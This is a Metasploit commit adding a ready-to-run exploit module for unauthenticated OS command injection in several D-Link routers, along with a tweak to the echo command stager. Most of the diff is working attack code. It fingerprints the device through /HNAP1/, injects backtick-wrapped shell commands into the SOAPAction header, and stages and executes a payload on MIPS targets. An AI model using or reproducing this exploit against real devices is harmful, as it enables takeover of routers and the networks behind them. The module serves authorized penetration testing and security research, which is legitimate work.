Land rapid7#5182, @m-1-k-3's exploit for Dlink UPnP SOAP-Header Injection

jvazquez-r7 · jvazquez-r7 · commit 1be04a9e7efd · 2015-05-29T14:49:09.000-05:00
diff --git a/lib/rex/exploitation/cmdstager/echo.rb b/lib/rex/exploitation/cmdstager/echo.rb
@@ -27,9 +27,12 @@ def initialize(exe)
   #
   def generate(opts = {})
     opts[:temp] = opts[:temp] || '/tmp/'
-    opts[:temp].gsub!(/\\/, "/")
-    opts[:temp] = opts[:temp].shellescape
-    opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+
+    unless opts[:temp].empty?
+      opts[:temp].gsub!(/\\/, '/')
+      opts[:temp] = opts[:temp].shellescape
+      opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    end
 
     # by default use the 'hex' encoding
     opts[:enc_format] = opts[:enc_format] || 'hex'
diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
+      'Description' => %q{
+        Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
+        interface. Since it is a blind OS command injection vulnerability, there is no
+        output for the executed command. This module has been tested on a DIR-645 device.
+        The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
+        DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
+        DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
+      },
+      'Author'      =>
+        [
+          'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
+          'Craig Heffner',  # independent Vulnerability discovery on different other routers
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
+          ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
+        ],
+      'DisclosureDate' => 'Feb 13 2015',
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Targets' =>
+        [
+          [ 'MIPS Little Endian',
+            {
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+            {
+              'Arch'     => ARCH_MIPSBE
+            }
+          ]
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    uri = '/HNAP1/'
+    soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'GET',
+        'headers' => {
+          'SOAPAction' => soap_action,
+          }
+      })
+
+      if res && [200].include?(res.code) && res.body =~ /D-Link/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 200,
+      :temp    => ''
+    )
+  end
+
+  def execute_command(cmd, opts)
+
+    uri = '/HNAP1/'
+
+    cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
+    soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'GET',
+        'headers' => {
+          'SOAPAction' => soap_action,
+          }
+      }, 3)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
